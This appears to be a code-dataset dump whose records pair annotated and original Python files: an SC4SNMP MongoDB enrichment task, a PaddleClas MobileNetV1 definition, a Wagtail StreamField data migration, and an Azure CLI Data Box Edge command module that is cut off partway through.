from celery.utils.log import get_task_logger
logger = get_task_logger(__name__)
# State-store connection settings; MONGO_DB defaults to "sc4snmp".
MONGO_URI = os.getenv("MONGO_URI")
MONGO_DB = os.getenv("MONGO_DB", "sc4snmp")
# System-level SNMP fields mirrored into the target's "state" document.
TRACKED_F = [
    "SNMPv2-MIB.sysDescr",
    "SNMPv2-MIB.sysObjectID",
    "SNMPv2-MIB.sysContact",
    "SNMPv2-MIB.sysName",
    "SNMPv2-MIB.sysLocation",
]
# Metric used to detect device restarts (a decreasing value means restart).
SYS_UP_TIME = "SNMPv2-MIB.sysUpTime"
# Flush queued Mongo updates once this many are pending.
MONGO_UPDATE_BATCH_THRESHOLD = 20
# Check whether sysUpTime decreased since the last poll; if so the device
# restarted, and a full SNMP walk is scheduled to refresh its state.
def check_restart(current_target, result, targets_collection, address):
    """Detect a device restart via a sysUpTime decrease and react.

    For every metric group carrying sysUpTime: if the stored value for this
    target is larger than the newly polled one, schedule an immediate walk
    task named ``sc4snmp;<address>;walk``; in all cases persist the latest
    sysUpTime into the target's document.

    :param current_target: target document previously loaded from Mongo
        (may lack the "sysUpTime" key on first contact)
    :param result: polled data — mapping of group key to group dict
    :param targets_collection: Mongo collection holding per-target state
    :param address: target address (document key)
    """
    for group_key, group_dict in result.items():
        if "metrics" in group_dict and SYS_UP_TIME in group_dict["metrics"]:
            sysuptime = group_dict["metrics"][SYS_UP_TIME]
            new_value = sysuptime["value"]
            logger.debug(f"current target = {current_target}")
            if "sysUpTime" in current_target:
                old_value = current_target["sysUpTime"]["value"]
                logger.debug(f"new_value = {new_value} old_value = {old_value}")
                # Uptime going backwards => the device rebooted.
                if int(new_value) < int(old_value):
                    task_config = {
                        "name": f"sc4snmp;{address};walk",
                        "run_immediately": True,
                    }
                    logger.info(f"Detected restart of {address}, triggering walk")
                    periodic_obj = customtaskmanager.CustomPeriodicTaskManager()
                    periodic_obj.manage_task(**task_config)
            # Persist the latest observed sysUpTime for the next comparison.
            state = {
                "value": sysuptime["value"],
                "type": sysuptime["type"],
                "oid": sysuptime["oid"],
            }
            targets_collection.update_one(
                {"address": address}, {"$set": {"sysUpTime": state}}, upsert=True
            )
class EnrichTask(Task):
    """No-op Celery ``Task`` subclass used as the base for ``enrich``."""
    def __init__(self):
        # Intentionally empty: overrides Task.__init__ without calling
        # super(), so no base-class initialization runs and the task
        # carries no per-instance state.
        pass
@shared_task(bind=True, base=EnrichTask)
def enrich(self, result):
    """Persist one device's freshly collected SNMP data to MongoDB and
    return ``result`` enriched with previously stored attribute fields.

    ``result`` is expected to be ``{"address": str, "result": {group_key:
    {"fields": {...}, "metrics": {...}}}}`` -- inferred from the accesses
    below; confirm against the producing task.
    """
    address = result["address"]
    mongo_client = pymongo.MongoClient(MONGO_URI)
    targets_collection = mongo_client.sc4snmp.targets
    attributes_collection = mongo_client.sc4snmp.attributes
    # Pending "$set" documents, flushed in batches of
    # MONGO_UPDATE_BATCH_THRESHOLD.
    # NOTE(review): these lists are passed as the update argument of
    # update_one, i.e. as an aggregation-pipeline update -- verify the
    # deployed MongoDB version and stage semantics support this.
    updates = []
    attribute_updates = []
    current_target = targets_collection.find_one(
        {"address": address}, {"target": True, "sysUpTime": True}
    )
    if not current_target:
        logger.info(f"First time for {address}")
        current_target = {"address": address}
    else:
        logger.info(f"Not first time for {address}")
        # TODO: Compare the ts field with the lastmodified time of record and only update if we are newer
        check_restart(current_target, result["result"], targets_collection, address)
    # First write back to DB new/changed data
    for group_key, group_data in result["result"].items():
        # 255-byte SHAKE digest -> 510 hex chars: a stable key for group
        # names that may contain characters Mongo field names dislike.
        group_key_hash = shake_128(group_key.encode()).hexdigest(255)
        current_attributes = attributes_collection.find_one(
            {"address": address, "group_key_hash": group_key_hash},
            {"fields": True, "id": True},
        )
        # First sighting of a group with data: record its readable id.
        if not current_attributes and group_data["fields"]:
            attributes_collection.update_one(
                {"address": address, "group_key_hash": group_key_hash},
                {"$set": {"id": group_key}},
                upsert=True,
            )
        for field_key, field_value in group_data["fields"].items():
            field_key_hash = shake_128(field_key.encode()).hexdigest(255)
            field_value["name"] = field_key
            # cv = currently stored value for this field, if any.
            cv = None
            if current_attributes and field_key_hash in current_attributes.get(
                "fields", {}
            ):
                cv = current_attributes["fields"][field_key_hash]
            if cv and not cv == field_value:
                # modified: overwrite the stored copy
                attribute_updates.append(
                    {"$set": {"fields": {field_key_hash: field_value}}}
                )
            elif cv:
                # unchanged
                pass
            else:
                # new
                attribute_updates.append(
                    {"$set": {"fields": {field_key_hash: field_value}}}
                )
            # Mirror well-known fields into the target's "state" document.
            if field_key in TRACKED_F:
                updates.append(
                    {"$set": {"state": {field_key.replace(".", "|"): field_value}}}
                )
            if len(updates) >= MONGO_UPDATE_BATCH_THRESHOLD:
                targets_collection.update_one(
                    {"address": address}, updates, upsert=True
                )
                updates.clear()
            if len(attribute_updates) >= MONGO_UPDATE_BATCH_THRESHOLD:
                attributes_collection.update_one(
                    {
                        "address": address,
                        "group_key_hash": group_key_hash,
                        "id": group_key,
                    },
                    attribute_updates,
                    upsert=True,
                )
                attribute_updates.clear()
        # Flush whatever remains buffered for this group.
        if updates:
            targets_collection.update_one({"address": address}, updates, upsert=True)
            updates.clear()
        if attribute_updates:
            attributes_collection.update_one(
                {"address": address, "group_key_hash": group_key_hash, "id": group_key},
                attribute_updates,
                upsert=True,
            )
            attribute_updates.clear()
    # Now add back any fields we need
    # NOTE(review): this block runs after the group loop and uses
    # current_attributes from the LAST iteration only, so earlier groups'
    # stored fields are never added back; it also raises NameError when
    # result["result"] is empty. Confirm whether per-group restore was meant.
    if current_attributes:
        attribute_group_id = current_attributes["id"]
        fields = current_attributes["fields"]
        if attribute_group_id in result["result"]:
            for persist_data in fields.values():
                if (
                    persist_data["name"]
                    not in result["result"][attribute_group_id]["fields"]
                ):
                    result["result"][attribute_group_id]["fields"][
                        persist_data["name"]
                    ] = persist_data
    return result
|
en
| 0.803392
|
# # Copyright 2021 Splunk Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # check if sysUpTime decreased, if so trigger new walk # TODO: Compare the ts field with the lastmodified time of record and only update if we are newer # First write back to DB new/changed data # modifed # unchanged # new # Now add back any fields we need
| 1.785046
| 2
|
ppcls/modeling/architectures/mobilenet_v1.py
|
cq2019git/PaddleClas
| 13
|
6628080
|
<gh_stars>10-100
#copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid as fluid
from paddle.fluid.initializer import MSRA
from paddle.fluid.param_attr import ParamAttr
__all__ = [
'MobileNetV1', 'MobileNetV1_x0_25', 'MobileNetV1_x0_5', 'MobileNetV1_x1_0',
'MobileNetV1_x0_75'
]
class MobileNetV1():
    """MobileNetV1 backbone/classifier built with paddle.fluid layers.

    ``scale`` is the width multiplier applied to every layer's channel
    counts (via ``int(channels * scale)`` in the helpers below).
    """
    def __init__(self, scale=1.0):
        self.scale = scale
    def net(self, input, class_dim=1000):
        """Build the network on ``input`` and return ``class_dim`` logits.

        Stage comments give feature-map resolutions -- presumably for a
        224x224 input (standard for this architecture); confirm with callers.
        """
        scale = self.scale
        # conv1: 112x112
        input = self.conv_bn_layer(
            input,
            filter_size=3,
            channels=3,
            num_filters=int(32 * scale),
            stride=2,
            padding=1,
            name="conv1")
        # 56x56
        input = self.depthwise_separable(
            input,
            num_filters1=32,
            num_filters2=64,
            num_groups=32,
            stride=1,
            scale=scale,
            name="conv2_1")
        input = self.depthwise_separable(
            input,
            num_filters1=64,
            num_filters2=128,
            num_groups=64,
            stride=2,
            scale=scale,
            name="conv2_2")
        # 28x28
        input = self.depthwise_separable(
            input,
            num_filters1=128,
            num_filters2=128,
            num_groups=128,
            stride=1,
            scale=scale,
            name="conv3_1")
        input = self.depthwise_separable(
            input,
            num_filters1=128,
            num_filters2=256,
            num_groups=128,
            stride=2,
            scale=scale,
            name="conv3_2")
        # 14x14
        input = self.depthwise_separable(
            input,
            num_filters1=256,
            num_filters2=256,
            num_groups=256,
            stride=1,
            scale=scale,
            name="conv4_1")
        input = self.depthwise_separable(
            input,
            num_filters1=256,
            num_filters2=512,
            num_groups=256,
            stride=2,
            scale=scale,
            name="conv4_2")
        # 14x14: five identical 512->512 blocks
        for i in range(5):
            input = self.depthwise_separable(
                input,
                num_filters1=512,
                num_filters2=512,
                num_groups=512,
                stride=1,
                scale=scale,
                name="conv5" + "_" + str(i + 1))
        # 7x7
        input = self.depthwise_separable(
            input,
            num_filters1=512,
            num_filters2=1024,
            num_groups=512,
            stride=2,
            scale=scale,
            name="conv5_6")
        input = self.depthwise_separable(
            input,
            num_filters1=1024,
            num_filters2=1024,
            num_groups=1024,
            stride=1,
            scale=scale,
            name="conv6")
        # Global average pool to 1x1, then one FC classification head.
        input = fluid.layers.pool2d(
            input=input, pool_type='avg', global_pooling=True)
        output = fluid.layers.fc(input=input,
                                 size=class_dim,
                                 param_attr=ParamAttr(
                                     initializer=MSRA(), name="fc7_weights"),
                                 bias_attr=ParamAttr(name="fc7_offset"))
        return output
    def conv_bn_layer(self,
                      input,
                      filter_size,
                      num_filters,
                      stride,
                      padding,
                      channels=None,
                      num_groups=1,
                      act='relu',
                      use_cudnn=True,
                      name=None):
        """Conv2d (bias-free, MSRA-initialized) followed by batch norm
        activated with ``act``.

        ``channels`` is accepted but unused -- kept for caller compatibility.
        """
        conv = fluid.layers.conv2d(
            input=input,
            num_filters=num_filters,
            filter_size=filter_size,
            stride=stride,
            padding=padding,
            groups=num_groups,
            act=None,
            use_cudnn=use_cudnn,
            param_attr=ParamAttr(
                initializer=MSRA(), name=name + "_weights"),
            bias_attr=False)
        bn_name = name + "_bn"
        return fluid.layers.batch_norm(
            input=conv,
            act=act,
            param_attr=ParamAttr(name=bn_name + "_scale"),
            bias_attr=ParamAttr(name=bn_name + "_offset"),
            moving_mean_name=bn_name + '_mean',
            moving_variance_name=bn_name + '_variance')
    def depthwise_separable(self,
                            input,
                            num_filters1,
                            num_filters2,
                            num_groups,
                            stride,
                            scale,
                            name=None):
        """Depthwise 3x3 conv (callers pass num_groups == num_filters1)
        followed by a pointwise 1x1 conv, each conv+BN -- the MobileNet
        building block. cuDNN is disabled for the grouped depthwise conv.
        """
        depthwise_conv = self.conv_bn_layer(
            input=input,
            filter_size=3,
            num_filters=int(num_filters1 * scale),
            stride=stride,
            padding=1,
            num_groups=int(num_groups * scale),
            use_cudnn=False,
            name=name + "_dw")
        pointwise_conv = self.conv_bn_layer(
            input=depthwise_conv,
            filter_size=1,
            num_filters=int(num_filters2 * scale),
            stride=1,
            padding=0,
            name=name + "_sep")
        return pointwise_conv
def MobileNetV1_x0_25():
    """MobileNetV1 with a 0.25 width multiplier."""
    return MobileNetV1(scale=0.25)
def MobileNetV1_x0_5():
    """MobileNetV1 with a 0.5 width multiplier."""
    return MobileNetV1(scale=0.5)
def MobileNetV1_x1_0():
    """Full-width (scale 1.0) MobileNetV1."""
    return MobileNetV1(scale=1.0)
def MobileNetV1_x0_75():
    """MobileNetV1 with a 0.75 width multiplier."""
    return MobileNetV1(scale=0.75)
|
#copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve.
#
#Licensed under the Apache License, Version 2.0 (the "License");
#you may not use this file except in compliance with the License.
#You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
#Unless required by applicable law or agreed to in writing, software
#distributed under the License is distributed on an "AS IS" BASIS,
#WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#See the License for the specific language governing permissions and
#limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import paddle.fluid as fluid
from paddle.fluid.initializer import MSRA
from paddle.fluid.param_attr import ParamAttr
__all__ = [
'MobileNetV1', 'MobileNetV1_x0_25', 'MobileNetV1_x0_5', 'MobileNetV1_x1_0',
'MobileNetV1_x0_75'
]
class MobileNetV1():
def __init__(self, scale=1.0):
self.scale = scale
def net(self, input, class_dim=1000):
scale = self.scale
# conv1: 112x112
input = self.conv_bn_layer(
input,
filter_size=3,
channels=3,
num_filters=int(32 * scale),
stride=2,
padding=1,
name="conv1")
# 56x56
input = self.depthwise_separable(
input,
num_filters1=32,
num_filters2=64,
num_groups=32,
stride=1,
scale=scale,
name="conv2_1")
input = self.depthwise_separable(
input,
num_filters1=64,
num_filters2=128,
num_groups=64,
stride=2,
scale=scale,
name="conv2_2")
# 28x28
input = self.depthwise_separable(
input,
num_filters1=128,
num_filters2=128,
num_groups=128,
stride=1,
scale=scale,
name="conv3_1")
input = self.depthwise_separable(
input,
num_filters1=128,
num_filters2=256,
num_groups=128,
stride=2,
scale=scale,
name="conv3_2")
# 14x14
input = self.depthwise_separable(
input,
num_filters1=256,
num_filters2=256,
num_groups=256,
stride=1,
scale=scale,
name="conv4_1")
input = self.depthwise_separable(
input,
num_filters1=256,
num_filters2=512,
num_groups=256,
stride=2,
scale=scale,
name="conv4_2")
# 14x14
for i in range(5):
input = self.depthwise_separable(
input,
num_filters1=512,
num_filters2=512,
num_groups=512,
stride=1,
scale=scale,
name="conv5" + "_" + str(i + 1))
# 7x7
input = self.depthwise_separable(
input,
num_filters1=512,
num_filters2=1024,
num_groups=512,
stride=2,
scale=scale,
name="conv5_6")
input = self.depthwise_separable(
input,
num_filters1=1024,
num_filters2=1024,
num_groups=1024,
stride=1,
scale=scale,
name="conv6")
input = fluid.layers.pool2d(
input=input, pool_type='avg', global_pooling=True)
output = fluid.layers.fc(input=input,
size=class_dim,
param_attr=ParamAttr(
initializer=MSRA(), name="fc7_weights"),
bias_attr=ParamAttr(name="fc7_offset"))
return output
def conv_bn_layer(self,
input,
filter_size,
num_filters,
stride,
padding,
channels=None,
num_groups=1,
act='relu',
use_cudnn=True,
name=None):
conv = fluid.layers.conv2d(
input=input,
num_filters=num_filters,
filter_size=filter_size,
stride=stride,
padding=padding,
groups=num_groups,
act=None,
use_cudnn=use_cudnn,
param_attr=ParamAttr(
initializer=MSRA(), name=name + "_weights"),
bias_attr=False)
bn_name = name + "_bn"
return fluid.layers.batch_norm(
input=conv,
act=act,
param_attr=ParamAttr(name=bn_name + "_scale"),
bias_attr=ParamAttr(name=bn_name + "_offset"),
moving_mean_name=bn_name + '_mean',
moving_variance_name=bn_name + '_variance')
def depthwise_separable(self,
input,
num_filters1,
num_filters2,
num_groups,
stride,
scale,
name=None):
depthwise_conv = self.conv_bn_layer(
input=input,
filter_size=3,
num_filters=int(num_filters1 * scale),
stride=stride,
padding=1,
num_groups=int(num_groups * scale),
use_cudnn=False,
name=name + "_dw")
pointwise_conv = self.conv_bn_layer(
input=depthwise_conv,
filter_size=1,
num_filters=int(num_filters2 * scale),
stride=1,
padding=0,
name=name + "_sep")
return pointwise_conv
def MobileNetV1_x0_25():
model = MobileNetV1(scale=0.25)
return model
def MobileNetV1_x0_5():
model = MobileNetV1(scale=0.5)
return model
def MobileNetV1_x1_0():
model = MobileNetV1(scale=1.0)
return model
def MobileNetV1_x0_75():
model = MobileNetV1(scale=0.75)
return model
|
en
| 0.813346
|
#copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. # #Licensed under the Apache License, Version 2.0 (the "License"); #you may not use this file except in compliance with the License. #You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # #Unless required by applicable law or agreed to in writing, software #distributed under the License is distributed on an "AS IS" BASIS, #WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. #See the License for the specific language governing permissions and #limitations under the License. # conv1: 112x112 # 56x56 # 28x28 # 14x14 # 14x14 # 7x7
| 2.100459
| 2
|
cms/migrations/0035_data_migration_for_content_field.py
|
Wassaf-Shahzad/micromasters
| 32
|
6628081
|
# Generated by Django 2.1.2 on 2019-01-15 12:04
import json
from django.core.serializers.json import DjangoJSONEncoder
from django.db import migrations
from wagtail.core.rich_text import RichText
def page_to_streamfield(page):
    """Wrap legacy raw-text content in a single rich_text StreamField block.

    Returns ``(page, changed)``; no-op when there is no raw text or the
    StreamField already has content.
    """
    raw = page.content.raw_text
    if not raw or page.content:
        return page, False
    page.content = [('rich_text', RichText(raw))]
    return page, True
def pagerevision_to_streamfield(revision_data):
    """If a revision's content is not valid JSON, wrap it as StreamField JSON.

    Returns ``(revision_data, changed)``.
    """
    content = revision_data.get('content')
    if not content:
        return revision_data, False
    try:
        json.loads(content)
    except ValueError:
        pass  # not JSON yet -> convert below
    else:
        # Already valid StreamField JSON. Leave it.
        return revision_data, False
    stream_block = [{"value": content, "type": "rich_text"}]
    revision_data['content'] = json.dumps(stream_block, cls=DjangoJSONEncoder)
    return revision_data, True
def page_to_richtext(page):
    """Flatten StreamField content back into one raw rich-text string.

    Returns ``(page, changed)``; only runs when raw_text is absent.
    """
    if page.content.raw_text is not None:
        return page, False
    pieces = [
        block.value.source
        for block in page.content
        if block.block_type == 'rich_text'
    ]
    page.content = ''.join(pieces)
    return page, True
def pagerevision_to_richtext(revision_data):
    """Collapse StreamField JSON content back into one rich-text string.

    Returns ``(revision_data, changed)``; non-JSON content is left alone.
    """
    content = revision_data.get('content', 'definitely non-JSON string')
    if not content:
        return revision_data, False
    try:
        blocks = json.loads(content)
    except ValueError:
        # It's not apparently a StreamField. Leave it.
        return revision_data, False
    joined = ''.join(
        block['value'] for block in blocks if block['type'] == 'rich_text'
    )
    revision_data['content'] = joined
    return revision_data, True
def convert(apps, schema_editor, page_converter, pagerevision_converter):
    """Run the given converters over every ProgramTabPage and its revisions,
    saving only the objects the converters actually changed."""
    ProgramTabPage = apps.get_model("cms", "ProgramTabPage")
    for page in ProgramTabPage.objects.all():
        page, page_dirty = page_converter(page)
        if page_dirty:
            page.save()
        for revision in page.revisions.all():
            data = json.loads(revision.content_json)
            data, revision_dirty = pagerevision_converter(data)
            if revision_dirty:
                revision.content_json = json.dumps(data, cls=DjangoJSONEncoder)
                revision.save()
def convert_to_streamfield(apps, schema_editor):
    """Forward migration: rich-text content -> StreamField JSON."""
    return convert(
        apps, schema_editor, page_to_streamfield, pagerevision_to_streamfield
    )
def convert_to_richtext(apps, schema_editor):
    """Reverse migration: StreamField JSON -> plain rich text."""
    return convert(
        apps, schema_editor, page_to_richtext, pagerevision_to_richtext
    )
class Migration(migrations.Migration):
    """Data migration converting ProgramTabPage.content to StreamField
    (forward) and back to rich text (reverse)."""
    dependencies = [
        ('cms', '0034_alter_content_feild'),
    ]
    operations = [
        migrations.RunPython(
            convert_to_streamfield,
            convert_to_richtext,  # reverse operation
        ),
    ]
|
# Generated by Django 2.1.2 on 2019-01-15 12:04
import json
from django.core.serializers.json import DjangoJSONEncoder
from django.db import migrations
from wagtail.core.rich_text import RichText
def page_to_streamfield(page):
changed = False
if page.content.raw_text and not page.content:
page.content = [('rich_text', RichText(page.content.raw_text))]
changed = True
return page, changed
def pagerevision_to_streamfield(revision_data):
changed = False
content = revision_data.get('content')
if content:
try:
json.loads(content)
except ValueError:
revision_data['content'] = json.dumps(
[{
"value": content,
"type": "rich_text"
}],
cls=DjangoJSONEncoder)
changed = True
else:
# It's already valid JSON. Leave it.
pass
return revision_data, changed
def page_to_richtext(page):
changed = False
if page.content.raw_text is None:
raw_text = ''.join([
child.value.source for child in page.content
if child.block_type == 'rich_text'
])
page.content = raw_text
changed = True
return page, changed
def pagerevision_to_richtext(revision_data):
changed = False
content = revision_data.get('content', 'definitely non-JSON string')
if content:
try:
content_data = json.loads(content)
except ValueError:
# It's not apparently a StreamField. Leave it.
pass
else:
raw_text = ''.join([
child['value'] for child in content_data
if child['type'] == 'rich_text'
])
revision_data['content'] = raw_text
changed = True
return revision_data, changed
def convert(apps, schema_editor, page_converter, pagerevision_converter):
ProgramTabPage = apps.get_model("cms", "ProgramTabPage")
for page in ProgramTabPage.objects.all():
page, changed = page_converter(page)
if changed:
page.save()
for revision in page.revisions.all():
revision_data = json.loads(revision.content_json)
revision_data, changed = pagerevision_converter(revision_data)
if changed:
revision.content_json = json.dumps(revision_data, cls=DjangoJSONEncoder)
revision.save()
def convert_to_streamfield(apps, schema_editor):
return convert(apps, schema_editor, page_to_streamfield, pagerevision_to_streamfield)
def convert_to_richtext(apps, schema_editor):
return convert(apps, schema_editor, page_to_richtext, pagerevision_to_richtext)
class Migration(migrations.Migration):
dependencies = [
('cms', '0034_alter_content_feild'),
]
operations = [
migrations.RunPython(
convert_to_streamfield,
convert_to_richtext,
),
]
|
en
| 0.939164
|
# Generated by Django 2.1.2 on 2019-01-15 12:04 # It's already valid JSON. Leave it. # It's not apparently a StreamField. Leave it.
| 2.160766
| 2
|
src/azure-cli/azure/cli/command_modules/databoxedge/manual/custom.py
|
YuanyuanNi/azure-cli
| 3,287
|
6628082
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
# pylint: disable=unused-argument
from azure.cli.core.util import sdk_no_wait
from azure.mgmt.databoxedge.models import Sku
def databoxedge_device_list(client,
                            resource_group_name=None,
                            expand=None):
    """List devices within a resource group when one is given, otherwise
    across the whole subscription."""
    if not resource_group_name:
        return client.list_by_subscription(expand=expand)
    return client.list_by_resource_group(resource_group_name=resource_group_name,
                                         expand=expand)
def databoxedge_device_show(client,
                            device_name,
                            resource_group_name):
    """Get a single Data Box Edge device."""
    return client.get(device_name=device_name,
                      resource_group_name=resource_group_name)
def databoxedge_device_create(client,
                              device_name,
                              resource_group_name,
                              location,
                              tags=None,
                              sku=None,
                              etag=None,
                              data_box_edge_device_status=None,
                              description=None,
                              model_description=None,
                              friendly_name=None,
                              no_wait=False):
    """Create or update a Data Box Edge device resource.

    Only explicitly supplied optional values are placed in the request
    payload; ``no_wait`` is forwarded to ``sdk_no_wait``.
    """
    data_box_edge_device = {'location': location}
    if tags is not None:
        data_box_edge_device['tags'] = tags
    if sku is not None:
        data_box_edge_device['sku'] = Sku(name=sku)
    if etag is not None:
        data_box_edge_device['etag'] = etag
    # Bug fix: the original tested `data_box_edge_device is not None`
    # (always true, it is the dict being built), so a None status was
    # written into the payload when the caller passed none. Test the
    # status argument itself instead.
    if data_box_edge_device_status is not None:
        data_box_edge_device['data_box_edge_device_status'] = data_box_edge_device_status
    if description is not None:
        data_box_edge_device['description'] = description
    if model_description is not None:
        data_box_edge_device['model_description'] = model_description
    if friendly_name is not None:
        data_box_edge_device['friendly_name'] = friendly_name
    return sdk_no_wait(no_wait,
                       client.begin_create_or_update,
                       device_name=device_name,
                       resource_group_name=resource_group_name,
                       data_box_edge_device=data_box_edge_device)
def databoxedge_device_update(client,
                              device_name,
                              resource_group_name,
                              tags=None):
    """Patch mutable device properties (currently only tags)."""
    parameters = {} if tags is None else {'tags': tags}
    return client.update(device_name=device_name,
                         resource_group_name=resource_group_name,
                         parameters=parameters)
def databoxedge_device_delete(client,
                              device_name,
                              resource_group_name,
                              no_wait=False):
    """Start deletion of a device; ``no_wait`` is forwarded to ``sdk_no_wait``."""
    return sdk_no_wait(no_wait,
                       client.begin_delete,
                       device_name=device_name,
                       resource_group_name=resource_group_name)
def databoxedge_device_download_update(client,
                                       device_name,
                                       resource_group_name,
                                       no_wait=False):
    """Start the download-updates operation on the device."""
    return sdk_no_wait(no_wait,
                       client.begin_download_updates,
                       device_name=device_name,
                       resource_group_name=resource_group_name)
def databoxedge_device_install_update(client,
                                      device_name,
                                      resource_group_name,
                                      no_wait=False):
    """Start the install-updates operation on the device."""
    return sdk_no_wait(no_wait,
                       client.begin_install_updates,
                       device_name=device_name,
                       resource_group_name=resource_group_name)
def databoxedge_device_scan_for_update(client,
                                       device_name,
                                       resource_group_name,
                                       no_wait=False):
    """Start the scan-for-updates operation on the device."""
    return sdk_no_wait(no_wait,
                       client.begin_scan_for_updates,
                       device_name=device_name,
                       resource_group_name=resource_group_name)
def databoxedge_device_show_update_summary(client,
                                           device_name,
                                           resource_group_name):
    """Get the device's update summary."""
    return client.get_update_summary(device_name=device_name,
                                     resource_group_name=resource_group_name)
def databoxedge_alert_list(client,
                           device_name,
                           resource_group_name):
    """List all alerts for a device."""
    return client.list_by_data_box_edge_device(device_name=device_name,
                                               resource_group_name=resource_group_name)
def databoxedge_alert_show(client,
                           device_name,
                           name,
                           resource_group_name):
    """Get a single alert by name."""
    return client.get(device_name=device_name,
                      name=name,
                      resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_list(client,
                                        device_name,
                                        resource_group_name):
    """List all bandwidth schedules on a device."""
    return client.list_by_data_box_edge_device(device_name=device_name,
                                               resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_show(client,
                                        device_name,
                                        name,
                                        resource_group_name):
    """Get a single bandwidth schedule by name."""
    return client.get(device_name=device_name,
                      name=name,
                      resource_group_name=resource_group_name)
def databoxedge_bandwidth_schedule_create(client,
                                          device_name,
                                          name,
                                          resource_group_name,
                                          start,
                                          stop,
                                          rate_in_mbps,
                                          days,
                                          no_wait=False):
    """Create (or update) a bandwidth schedule; all four schedule fields
    are required and sent as-is."""
    parameters = {}
    parameters['start'] = start
    parameters['stop'] = stop
    parameters['rate_in_mbps'] = rate_in_mbps
    parameters['days'] = days
    return sdk_no_wait(no_wait,
                       client.begin_create_or_update,
                       device_name=device_name,
                       name=name,
                       resource_group_name=resource_group_name,
                       parameters=parameters)
def databoxedge_bandwidth_schedule_update(instance,
                                          device_name,
                                          name,
                                          resource_group_name,
                                          start,
                                          stop,
                                          rate_in_mbps,
                                          days,
                                          no_wait=False):
    """Generic-update hook: copy each non-None argument onto the retrieved
    schedule ``instance`` and return it for the CLI framework to submit."""
    new_values = {
        'start': start,
        'stop': stop,
        'rate_in_mbps': rate_in_mbps,
        'days': days,
    }
    for attr, value in new_values.items():
        if value is not None:
            setattr(instance, attr, value)
    return instance
def databoxedge_bandwidth_schedule_delete(client,
                                          device_name,
                                          name,
                                          resource_group_name,
                                          no_wait=False):
    """Start deletion of a bandwidth schedule."""
    return sdk_no_wait(no_wait,
                       client.begin_delete,
                       device_name=device_name,
                       name=name,
                       resource_group_name=resource_group_name)
def databoxedge_show_job(client,
                         device_name,
                         name,
                         resource_group_name):
    """Get a device job by name."""
    return client.get(device_name=device_name,
                      name=name,
                      resource_group_name=resource_group_name)
def databoxedge_list_node(client,
                          device_name,
                          resource_group_name):
    """List the nodes of a device."""
    return client.list_by_data_box_edge_device(device_name=device_name,
                                               resource_group_name=resource_group_name)
def databoxedge_order_list(client,
                           device_name,
                           resource_group_name):
    """List orders for a device."""
    return client.list_by_data_box_edge_device(device_name=device_name,
                                               resource_group_name=resource_group_name)
def databoxedge_order_show(client,
                           device_name,
                           resource_group_name):
    """Get the order for a device."""
    return client.get(device_name=device_name,
                      resource_group_name=resource_group_name)
def databoxedge_order_create(client,
                             device_name,
                             resource_group_name,
                             address_line1,
                             postal_code,
                             city,
                             state,
                             country,
                             contact_person,
                             company_name,
                             phone,
                             email_list,
                             status,
                             comments=None,
                             address_line2=None,
                             address_line3=None,
                             no_wait=False):
    """Create (or update) the order for a device.

    Builds the nested order payload (current_status, shipping_address,
    contact_information); optional comment/address lines are included only
    when supplied.
    """
    order = {}
    order['current_status'] = {}
    order['current_status']['status'] = status
    if comments is not None:
        order['current_status']['comments'] = comments
    order['shipping_address'] = {}
    order['shipping_address']['address_line1'] = address_line1
    if address_line2 is not None:
        order['shipping_address']['address_line2'] = address_line2
    if address_line3 is not None:
        order['shipping_address']['address_line3'] = address_line3
    order['shipping_address']['postal_code'] = postal_code
    order['shipping_address']['city'] = city
    order['shipping_address']['state'] = state
    order['shipping_address']['country'] = country
    order['contact_information'] = {}
    order['contact_information']['contact_person'] = contact_person
    order['contact_information']['company_name'] = company_name
    order['contact_information']['phone'] = phone
    order['contact_information']['email_list'] = email_list
    return sdk_no_wait(no_wait,
                       client.begin_create_or_update,
                       device_name=device_name,
                       resource_group_name=resource_group_name,
                       order=order)
def databoxedge_order_update(instance,
                             device_name,
                             resource_group_name,
                             status=None,
                             comments=None,
                             address_line1=None,
                             address_line2=None,
                             address_line3=None,
                             postal_code=None,
                             city=None,
                             state=None,
                             country=None,
                             contact_person=None,
                             company_name=None,
                             phone=None,
                             email_list=None,
                             no_wait=False):
    """Generic-update hook: copy each non-None argument onto the matching
    nested attribute of the retrieved order ``instance`` and return it."""
    field_map = {
        ('current_status', 'status'): status,
        ('current_status', 'comments'): comments,
        ('shipping_address', 'address_line1'): address_line1,
        ('shipping_address', 'address_line2'): address_line2,
        ('shipping_address', 'address_line3'): address_line3,
        ('shipping_address', 'postal_code'): postal_code,
        ('shipping_address', 'city'): city,
        ('shipping_address', 'state'): state,
        ('shipping_address', 'country'): country,
        ('contact_information', 'contact_person'): contact_person,
        ('contact_information', 'company_name'): company_name,
        ('contact_information', 'phone'): phone,
        ('contact_information', 'email_list'): email_list,
    }
    for (section, attr), value in field_map.items():
        if value is not None:
